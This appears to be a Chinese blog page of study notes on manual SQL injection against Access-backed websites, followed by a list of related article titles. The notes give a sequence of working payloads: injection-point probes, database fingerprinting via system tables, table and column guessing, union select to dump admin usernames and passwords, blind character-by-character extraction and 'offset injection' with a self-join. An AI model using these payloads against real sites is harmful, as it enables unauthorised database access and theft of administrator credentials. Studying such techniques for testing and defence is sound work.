ACCESS注入

一:判断注入点

‘        报错

and 1=1   正确

and 1=2   报错

or 1=1    报错

or 1=2    正确

and 1=111

判断是否带入连接查询:返回正确的话带入连接查询。报错则不带入。

二:判断数据库类型

and exsits (select * from msysobjects) >0       ACCESS

and exsits (select * from sysobjects) >0       SQL server

三:判断数据库表

and exists(select * from admin)       判断存不存在这个表

四:判断字段名

and exists(select 猜测的字段名 from admin)

五:判断字段长度

order by 猜测的长度

六:报错

and 1=2 union select 1,2,3,4,5,6...,字段长度 from admin

例:报错3和5,将3和5改成admin和passwd爆出账号密码

七:判断账号密码的长度、内容

and (select len(字段名) from 表名)=猜测长度

and (select top 1 asc(mid(列名,第几位,1)) from 表名)=97 a

八:偏移注入

1、利用“*”代替admin表内存在的字段,从最后的字段开始逐步测试,直到返回正常。

2、基本公式:order by出的字段数减去*号的字段数,然后再用order by的字段数减去2倍刚才得出来的答案

3、union select 1,2,3,4,a.id,b.id,* from (sys_admin as a inner join sys_admin as b on a.id = b.id)

#这里union select 1,2,3,4 顾名思义就是基础公式得出来的长度。

ACCESS手工注入学习笔记相关推荐

  1. Access手工注入

    access手工注入 哈哈哈哈,,,我顾北清又回来啦,接着更新. 实验环境:win2008R2虚拟机,物理机(也就是我的win10). 搭建环境用的是access+asp源码. 环境搭建可以参照这里, ...

  2. 探针一号的SQL注入学习笔记

    SQL注入学习笔记 文章目录 SQL注入学习笔记 1.问题 2.sqlilabs环境配置 3.第一个注入过程详解(整型注入) 4.跨库注入 5.字符型注入 5.报错注入 6.POST和COOKIE请求 ...

  3. SQL手工注入网站笔记

    SQL手工注入网站笔记 目标网站:http://testphp.vulnweb.com/listproducts.php?cat=1 1.判断注入点: http://testphp.vulnweb.c ...

  4. sql注入学习笔记(4)--sqlmap注入心得

    其实也不算心得吧,只是一点小小的体会,抛砖引玉 怎么说呢,还是主要分享一下sql注入的思路,具体的操作还是要看网站了 第一步,注入点 sql注入点最好的寻找方式就是用google,可以经常去googl ...

  5. access手工注入笔记

    http://www.xxx.com/news.asp?id=6 注入点 判断是否存在注入 两次返回不一样 存在注入 http://www.xxx.com/news.asp?id=6 and 1=1 ...

  6. sql注入 学习笔记

    学习来源视频:https://www.bilibili.com/video/BV1HT411E7bH?p=1&vd_source=91ac068ef47e260a09856e8db81907c ...

  7. java sql objects_Java SQL注入学习笔记

    1 简介 文章主要内容包括: Java 持久层技术/框架简单介绍 不同场景/框架下易导致 SQL 注入的写法 如何避免和修复 SQL 注入 2 JDBC 介绍 JDBC: 全称 Java Databa ...

  8. Java SQL注入学习笔记

    1 简介 文章主要内容包括: Java 持久层技术/框架简单介绍 不同场景/框架下易导致 SQL 注入的写法 如何避免和修复 SQL 注入 2 JDBC 介绍 JDBC: 全称 Java Databa ...

  9. Java SQL 注入学习笔记

    介绍 JDBC: 全称 Java Database Connectivity是 Java 访问数据库的 API,不依赖于特定数据库 ( database-independent )所有 Java 持久 ...

最新文章

  1. mysql存储过程参数可选,如何在T-SQL存储过程中使用可选参数?
  2. 炎热夏天到底如何让自己更凉快? - 生活至上,美容至尚!
  3. 独家 | 一文读懂概率论学习:贝叶斯理论(附链接)
  4. 关于使用mail命令产生:-bash: mail: command not found的解决方法
  5. Leetcode 113. 路径总和 II 解题思路及C++实现
  6. [云炬创业基础笔记]第七张创业团队测试3
  7. 文件系统损坏导致虚拟机无法正常启动的问题及解决方法
  8. vcode tsconfig.json 无故报错 -- 找不到任何输入
  9. fatal error C1083: 无法打开包括文件:“stdio.h
  10. 【大数据】分布式集群部署
  11. win7磁盘清理_为什么要清理磁盘碎片,win7电脑怎么清理磁盘碎片
  12. 计算机课设容易挂吗,数学差的学生避开这4大专业,挂科是常态,每年都有学生不能毕业...
  13. ProgressBar与Handler的整合应用
  14. PostgreSQL常用SQL
  15. bytes数组转string指定编码_好程序员Java学习路线分享Java基础之string
  16. kafka消息队列的概念理解
  17. [Hands-on Lab (2) - 使用Helm部署OpenShift应用
  18. Java8 Math新增方法
  19. 子过程或函数未定义_Power Pivotamp;Power BI DAX函数说明速查
  20. idesk卸载教程_iDesk助手使用帮助

热门文章

  1. emqx开启自定义权限认证
  2. LSP“浏览器劫持概念
  3. 在vue3+vite中引入高德开放平台API实现边界范围多边形的绘制
  4. 中国互联网大厂布局元宇宙现状如何?
  5. eclipse安装配置记录
  6. dw超链接标签_超链接_blank标签和_self标签有什么不同
  7. 如何将视频从QSV格式转换为MP4格式
  8. 大数据安全审计——公安敏感数据的守护神
  9. 每日一练 通货膨胀-x国货币
  10. 树莓派4B无屏幕连接Wi-Fi/启用ssh/创建用户